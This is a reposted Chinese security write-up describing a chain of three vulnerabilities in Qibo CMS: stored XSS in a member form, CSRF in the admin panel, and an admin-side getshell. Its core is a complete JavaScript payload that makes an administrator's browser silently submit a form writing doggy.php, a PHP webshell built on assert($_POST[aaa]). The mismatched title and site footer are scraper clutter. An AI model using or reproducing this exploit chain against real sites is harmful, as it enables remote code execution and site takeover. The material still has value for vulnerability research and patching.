齐博cms使用手册_js中src中的参数

齐博cms使用手册_js中src中的参数齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell3个0day结合起来的威力拿下齐博cms,虽然不算什么严重的漏洞,但是中途遇到的问题和突破还是聊以慰藉的,还

齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什么严重的漏洞,但是中途遇到的问题和突破还是聊以慰藉的,还请各位看官轻轻拍砖. ——by pandas

前一段时间西毒爆出qibocms 0day的时候 就看过齐博cms的代码,发现了几个后台的getshell,后台getshell很多,拿不出手,厂商也是无影响积极忽略的态度,后台提交表单基本都存在CSRF,如果能有一个前台的getshell威力应该会增加许多,于是就去前台黑盒挖出了一个xss.这样结合起来就可以getshell了.

1.存储型XSS位置:会员中心->万能表单->发布信息->版主申请:

postdb[sortname][] 的提交值没有经过过滤,但是进行了长度限制,不过这个长度足以写

于是就提交一个php写文件的代码即可.

1.js内容如下:

thisTHost = top.location.hostname;

thisTHost = “http://”+thisTHost+”/v7/admin/index.php?lfj=jfadmin&action=addjf”;

function PostSubmit(url) {

var postUrl = url;

var ExportForm = document.createElement(“FORM”);

document.body.appendChild(ExportForm);

ExportForm.method = “POST”;

var newElement = document.createElement(“input”);

newElement.setAttribute(“name”, “title”);

var newElement2 = document.createElement(“input”);

newElement2.setAttribute(“name”, “fid”);

var newElement3 = document.createElement(“input”);

newElement3.setAttribute(“name”, “list”);

var newElement4 = document.createElement(“input”);

newElement4.setAttribute(“name”, “content”);

ExportForm.appendChild(newElement);

ExportForm.appendChild(newElement2);

ExportForm.appendChild(newElement3);

ExportForm.appendChild(newElement4);

newElement.value = “${@fwrite(fopen(‘doggy.php’, ‘w+’), ‘<?php assert($_POST[aaa]);?>’)}”;

newElement2.value = 1;

newElement3.value = 1;

newElement4.value = 1;

ExportForm.action = postUrl;

ExportForm.submit();

};

PostSubmit(thisTHost);

分为两个部分证明:

1.用户部分

1)登录

0Z45013I-0.jpg

2)写xss

0Z4501343-1.jpg

2.管理员部分

查看申请

0Z4503363-2.jpg

在网站/admin目录下会增加doggy.php

0Z450F22-3.jpg

内容:

0Z4502M8-4.jpg

修复方案:

重视即可修复

http://www.dengb.com/wzaq/728283.htmlwww.dengb.comtruehttp://www.dengb.com/wzaq/728283.htmlTechArticle齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什…

今天的文章齐博cms使用手册_js中src中的参数分享到此就结束了,感谢您的阅读。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/68060.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注